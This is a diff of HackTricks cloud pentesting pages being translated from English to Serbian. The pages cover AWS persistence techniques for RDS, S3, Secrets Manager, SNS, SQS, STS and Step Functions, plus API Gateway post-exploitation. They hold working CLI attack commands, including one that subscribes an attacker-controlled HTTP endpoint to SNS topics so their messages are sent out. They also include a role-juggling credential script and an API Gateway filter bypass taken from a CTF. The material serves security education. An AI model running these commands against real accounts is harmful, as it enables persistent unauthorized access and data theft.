- Koristeći tradicionalni **rootkit** na primer
- Dodajući novi **javnu SSH ključ**
- Izlaganje porta sa port knocking uz backdoor
### DNS persistence
### DNS postojanost
If domains are configured:
Ako su domeni konfigurisani:
- Create a subdomain pointing your IP so you will have a **subdomain takeover**
- Create **SPF** record allowing you to send **emails** from the domain
- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
- Kreirajte poddomen koji usmerava na vašu IP adresu kako biste imali **preuzimanje poddomena**
- Kreirajte **SPF** zapis koji vam omogućava da šaljete **emailove** sa domena
- Konfigurišite **glavnu IP adresu domena na svoju** i izvršite **MitM** od vaše IP adrese do legitimnih
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
View File

@@ -1,35 +1,27 @@
# AWS - RDS Persistence
# AWS - RDS Persistencija
{{#include ../../../banners/hacktricks-training.md}}
## RDS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}
### Make instance publicly accessible: `rds:ModifyDBInstance`
An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
### Omogućite javni pristup instanci: `rds:ModifyDBInstance`
Napadač sa ovom dozvolom može **modifikovati postojeću RDS instancu kako bi omogućio javni pristup**.
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
### Kreirajte admin korisnika unutar DB
### Create an admin user inside the DB
An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
### Make snapshot public
Napadač može jednostavno **napraviti korisnika unutar DB** tako da čak i ako se lozinka glavnog korisnika promeni, on **ne gubi pristup** bazi podataka.
### Učinite snimak javnim
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
```
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
View File

@@ -4,26 +4,22 @@
## S3
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-s3-athena-and-glacier-enum.md
{{#endref}}
### KMS Client-Side Encryption
### KMS Klijentska Enkripcija
When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
Kada je proces enkripcije završen, korisnik će koristiti KMS API da generiše novi ključ (`aws kms generate-data-key`) i on će **sacuvati generisani enkriptovani ključ unutar metapodataka** datoteke ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) tako da kada dođe do dekripcije, može ponovo da ga dekriptuje koristeći KMS:
<figure><img src="../../../images/image (226).png" alt=""><figcaption></figcaption></figure>
Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
Stoga, napadač bi mogao da dobije ovaj ključ iz metapodataka i dekriptuje sa KMS (`aws kms decrypt`) da bi dobio ključ koji je korišćen za enkripciju informacija. Na ovaj način, napadač će imati ključ za enkripciju i ako se taj ključ ponovo koristi za enkripciju drugih datoteka, moći će da ga iskoristi.
### Using S3 ACLs
### Korišćenje S3 ACL-a
Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
Iako su obično ACL-ovi kanti onemogućeni, napadač sa dovoljno privilegija mogao bi da ih zloupotrebi (ako su omogućeni ili ako napadač može da ih omogući) da zadrži pristup S3 kanti.
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
View File

@@ -1,57 +1,51 @@
# AWS - Secrets Manager Persistence
# AWS - Održavanje u Secrets Manager-u
{{#include ../../../banners/hacktricks-training.md}}
## Secrets Manager
For more info check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
### Via Resource Policies
### Putem politika resursa
It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
Moguće je **dodeliti pristup tajnama spoljnim nalozima** putem politika resursa. Pogledajte [**stranicu o Privesc-u za Secrets Manager**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) za više informacija. Imajte na umu da da bi **pristupio tajni**, spoljni nalog će takođe **morati da ima pristup KMS ključu koji enkriptuje tajnu**.
### Via Secrets Rotate Lambda
### Putem Lambda funkcije za rotaciju tajni
To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
This is how lambda code for such action could look like:
Da bi se **automatski rotirale tajne**, poziva se konfigurisana **Lambda**. Ako bi napadač mogao da **izmeni** **kod**, mogao bi direktno da **izvuče novu tajnu** za sebe.
Ovako bi kod lambda funkcije za takvu akciju mogao izgledati:
```python
import boto3
def rotate_secrets(event, context):
# Create a Secrets Manager client
client = boto3.client('secretsmanager')
# Create a Secrets Manager client
client = boto3.client('secretsmanager')
# Retrieve the current secret value
secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
# Retrieve the current secret value
secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
# Rotate the secret by updating its value
new_secret_value = rotate_secret(secret_value)
client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
# Rotate the secret by updating its value
new_secret_value = rotate_secret(secret_value)
client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
def rotate_secret(secret_value):
# Perform the rotation logic here, e.g., generate a new password
# Perform the rotation logic here, e.g., generate a new password
# Example: Generate a new password
new_secret_value = generate_password()
# Example: Generate a new password
new_secret_value = generate_password()
return new_secret_value
return new_secret_value
def generate_password():
# Example: Generate a random password using the secrets module
import secrets
import string
password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
return password
# Example: Generate a random password using the secrets module
import secrets
import string
password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
return password
```
{{#include ../../../banners/hacktricks-training.md}}

116
src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
View File

@@ -4,7 +4,7 @@
## SNS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-sns-enum.md
@@ -12,74 +12,66 @@ For more information check:
### Persistence
When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
Kada kreirate **SNS temu**, potrebno je da navedete IAM politikom **ko ima pristup za čitanje i pisanje**. Moguće je navesti spoljne naloge, ARN uloga, ili **čak "\*"**.\
Sledeća politika daje svima u AWS-u pristup za čitanje i pisanje u SNS temu pod nazivom **`MySNS.fifo`**:
```json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}
```
### Kreirajte Pretplatnike
### Create Subscribers
To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
Da bi se nastavilo sa eksfiltracijom svih poruka sa svih tema, napadač može **kreirati pretplatnike za sve teme**.
Napomena: ako je **tema tipa FIFO**, samo pretplatnici koji koriste protokol **SQS** mogu se koristiti.
```bash
aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
```
{{#include ../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
View File

@@ -4,40 +4,34 @@
## SQS
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}
### Using resource policy
In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
### Korišćenje politike resursa
U SQS-u morate naznačiti sa IAM politikom **ko ima pristup za čitanje i pisanje**. Moguće je naznačiti spoljne naloge, ARN uloga, ili **čak "\*"**.\
Sledeća politika daje svima u AWS-u pristup svemu u redu pod nazivom **MyTestQueue**:
```json
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["SQS:*"],
"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
}
]
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["SQS:*"],
"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
}
]
}
```
> [!NOTE]
> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
> Možete čak **pokrenuti Lambda u nalogu napadača svaki put kada se nova poruka** stavi u red (morali biste je ponovo staviti) na neki način. Za ovo pratite ove instrukcije: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
{{#include ../../../banners/hacktricks-training.md}}

5
src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
View File

@@ -1,6 +1 @@
# AWS - SSM Perssitence

14
src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
View File

@@ -4,22 +4,18 @@
## Step Functions
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-stepfunctions-enum.md
{{#endref}}
### Step function Backdooring
### Backdooring step funkcija
Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
Backdoor-ujte step funkciju da izvršava bilo koju tehniku persistencije tako da svaki put kada se izvrši, pokreće vaše zlonamerne korake.
### Backdooring aliases
### Backdooring aliasa
If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
Ako AWS nalog koristi alias za pozivanje step funkcija, bilo bi moguće modifikovati alias da koristi novu backdoor-ovanu verziju step funkcije.
{{#include ../../../banners/hacktricks-training.md}}

128
src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
View File

@@ -4,7 +4,7 @@
## STS
For more information access:
Za više informacija pristupite:
{{#ref}}
../aws-services/aws-sts-enum.md
@@ -12,54 +12,51 @@ For more information access:
### Assume role token
Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
Privremeni tokeni se ne mogu listati, tako da održavanje aktivnog privremenog tokena predstavlja način za održavanje postojanosti.
<pre class="language-bash"><code class="lang-bash">aws sts get-session-token --duration-seconds 129600
# With MFA
# Sa MFA
aws sts get-session-token \
--serial-number &#x3C;mfa-device-name> \
--token-code &#x3C;code-from-token>
--serial-number &#x3C;mfa-device-name> \
--token-code &#x3C;code-from-token>
# Hardware device name is usually the number from the back of the device, such as GAHT12345678
<strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
</strong># Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
# Ime hardverskog uređaja je obično broj sa zadnje strane uređaja, kao što je GAHT12345678
<strong># Ime SMS uređaja je ARN u AWS, kao što je arn:aws:iam::123456789012:sms-mfa/username
</strong># Ime virtuelnog uređaja je ARN u AWS, kao što je arn:aws:iam::123456789012:mfa/username
</code></pre>
### Role Chain Juggling
[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
[**Lanci uloga su priznata AWS funkcija**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), često korišćena za održavanje stealth postojanosti. Uključuje sposobnost da **preuzmete ulogu koja zatim preuzima drugu**, potencijalno se vraćajući na početnu ulogu na **cikličan način**. Svaki put kada se preuzme uloga, polje isteka kredencijala se osvežava. Kao rezultat, ako su dve uloge konfigurisane da međusobno preuzimaju jedna drugu, ova postavka omogućava večnu obnovu kredencijala.
Možete koristiti ovaj [**alat**](https://github.com/hotnops/AWSRoleJuggler/) da nastavite sa lancima uloga:
```bash
./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
optional arguments:
-h, --help show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
-h, --help show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
```
> [!CAUTION]
> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
> Imajte na umu da [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) skripta iz tog Github repozitorijuma ne pronalazi sve načine na koje se lanac uloga može konfigurisati.
<details>
<summary>Code to perform Role Juggling from PowerShell</summary>
<summary>Kod za izvođenje Role Juggling iz PowerShell-a</summary>
```powershell
# PowerShell script to check for role juggling possibilities using AWS CLI
# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
exit
Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
exit
}
# Function to list IAM roles
function List-IAMRoles {
aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}
# Initialize error count
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
# Attempt to assume each role
foreach ($role in $roles) {
$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
try {
$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($credentials) {
Write-Host "Successfully assumed role: $($role.RoleName)"
Write-Host "Access Key: $($credentials.AccessKeyId)"
Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
Write-Host "Session Token: $($credentials.SessionToken)"
Write-Host "Expiration: $($credentials.Expiration)"
$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
try {
$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($credentials) {
Write-Host "Successfully assumed role: $($role.RoleName)"
Write-Host "Access Key: $($credentials.AccessKeyId)"
Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
Write-Host "Session Token: $($credentials.SessionToken)"
Write-Host "Expiration: $($credentials.Expiration)"
# Set temporary credentials to assume the next role
$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
$env:AWS_SESSION_TOKEN = $credentials.SessionToken
# Set temporary credentials to assume the next role
$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
$env:AWS_SESSION_TOKEN = $credentials.SessionToken
# Try to assume another role using the temporary credentials
foreach ($nextRole in $roles) {
if ($nextRole.Arn -ne $role.Arn) {
$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
try {
$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($nextCredentials) {
Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
Write-Host "Session Token: $($nextCredentials.SessionToken)"
Write-Host "Expiration: $($nextCredentials.Expiration)"
}
} catch {
$errorCount++
}
}
}
# Try to assume another role using the temporary credentials
foreach ($nextRole in $roles) {
if ($nextRole.Arn -ne $role.Arn) {
$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
try {
$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($nextCredentials) {
Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
Write-Host "Session Token: $($nextCredentials.SessionToken)"
Write-Host "Expiration: $($nextCredentials.Expiration)"
}
} catch {
$errorCount++
}
}
}
# Reset environment variables
Remove-Item Env:\AWS_ACCESS_KEY_ID
Remove-Item Env:\AWS_SECRET_ACCESS_KEY
Remove-Item Env:\AWS_SESSION_TOKEN
} else {
$errorCount++
}
} catch {
$errorCount++
}
# Reset environment variables
Remove-Item Env:\AWS_ACCESS_KEY_ID
Remove-Item Env:\AWS_SECRET_ACCESS_KEY
Remove-Item Env:\AWS_SESSION_TOKEN
} else {
$errorCount++
}
} catch {
$errorCount++
}
}
# Output the number of errors if any
if ($errorCount -gt 0) {
Write-Host "$errorCount error(s) occurred during role assumption attempts."
Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
Write-Host "No errors occurred. All roles checked successfully."
Write-Host "No errors occurred. All roles checked successfully."
}
Write-Host "Role juggling check complete."
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

5
src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
View File

@@ -1,6 +1 @@
# AWS - Post Exploitation

78
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
View File

@@ -4,48 +4,43 @@
## API Gateway
For more information check:
Za više informacija pogledajte:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
### Access unexposed APIs
### Pristup neizloženim API-ima
You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
Možete kreirati endpoint na [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) sa servisom `com.amazonaws.us-east-1.execute-api`, izložiti endpoint u mreži kojoj imate pristup (potencijalno putem EC2 mašine) i dodeliti sigurnosnu grupu koja omogućava sve veze.\
Zatim, sa EC2 mašine moći ćete da pristupite endpoint-u i tako pozovete gateway API koji nije bio izložen ranije.
### Bypass Request body passthrough
### Obilaženje Request body passthrough
This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
Ova tehnika je pronađena u [**ovom CTF izveštaju**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
Kao što je navedeno u [**AWS dokumentaciji**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) u sekciji `PassthroughBehavior`, podrazumevano, vrednost **`WHEN_NO_MATCH`**, prilikom provere **Content-Type** header-a zahteva, će proslediti zahtev ka back end-u bez transformacije.
Stoga, u CTF-u je API Gateway imao integracioni šablon koji je **sprečavao da se zastavica exfiltrira** u odgovoru kada je zahtev poslat sa `Content-Type: application/json`:
```yaml
RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
```
Međutim, slanje zahteva sa **`Content-type: text/json`** bi sprečilo taj filter.
However, sending a request with **`Content-type: text/json`** would prevent that filter.
Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
Na kraju, pošto je API Gateway dozvoljavao samo `Get` i `Options`, bilo je moguće poslati proizvoljnu dynamoDB upit bez ikakvih ograničenja slanjem POST zahteva sa upitom u telu i korišćenjem header-a `X-HTTP-Method-Override: GET`:
```bash
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
```
### Usage Plans DoS
In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
U sekciji **Enumeration** možete videti kako da **dobijete plan korišćenja** ključeva. Ako imate ključ i on je **ograničen** na X korišćenja **mesečno**, možete **samo da ga koristite i izazovete DoS**.
The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
**API Key** samo treba da bude **uključen** unutar **HTTP header-a** pod nazivom **`x-api-key`**.
### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
Napadač sa dozvolama `apigateway:UpdateGatewayResponse` i `apigateway:CreateDeployment` može **modifikovati postojeći Gateway Response da uključi prilagođene header-e ili šablone odgovora koji otkrivaju osetljive informacije ili izvršavaju zlonamerne skripte**.
```bash
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
**Potencijalni uticaj**: Curjenje osetljivih informacija, izvršavanje zlonamernih skripti ili neovlašćen pristup API resursima.
> [!NOTE]
> Need testing
> Potrebno testiranje
### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
Napadač sa dozvolama `apigateway:UpdateStage` i `apigateway:CreateDeployment` može **modifikovati postojeću API Gateway fazu da preusmeri saobraćaj na drugu fazu ili promeni postavke keširanja kako bi stekao neovlašćen pristup keširanim podacima**.
```bash
API_ID="your-api-id"
STAGE_NAME="Prod"
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
**Potencijalni uticaj**: Neovlašćen pristup keširanim podacima, ometanje ili presretanje API saobraćaja.
**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
> [!NOTE]
> Need testing
> [!NAPOMENA]
> Potrebno testiranje
### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
Napadač sa dozvolama `apigateway:PutMethodResponse` i `apigateway:CreateDeployment` može **modifikovati odgovor metode postojećeg API Gateway REST API metoda da uključuje prilagođene zaglavlja ili šablone odgovora koji otkrivaju osetljive informacije ili izvršavaju zlonamerne skripte**.
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
**Potencijalni uticaj**: Curjenje osetljivih informacija, izvršavanje malicioznih skripti ili neovlašćen pristup API resursima.
> [!NOTE]
> Need testing
> Potrebno testiranje
### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
Napadač sa dozvolama `apigateway:UpdateRestApi` i `apigateway:CreateDeployment` može **modifikovati podešavanja API Gateway REST API-a da onemogući logovanje ili promeni minimalnu TLS verziju, potencijalno slabeći bezbednost API-a**.
```bash
API_ID="your-api-id"
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
**Potencijalni uticaj**: Slabljenje bezbednosti API-ja, što potencijalno omogućava neovlašćen pristup ili izlaganje osetljivih informacija.
> [!NOTE]
> Need testing
> Potrebno testiranje
### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
Napadač sa dozvolama `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, i `apigateway:CreateUsagePlanKey` može **kreirati nove API ključeve, povezati ih sa planovima korišćenja, a zatim koristiti ove ključeve za neovlašćen pristup API-jevima**.
```bash
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
```
**Potencijalni uticaj**: Neovlašćen pristup API resursima, zaobilaženje bezbednosnih kontrola.
**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
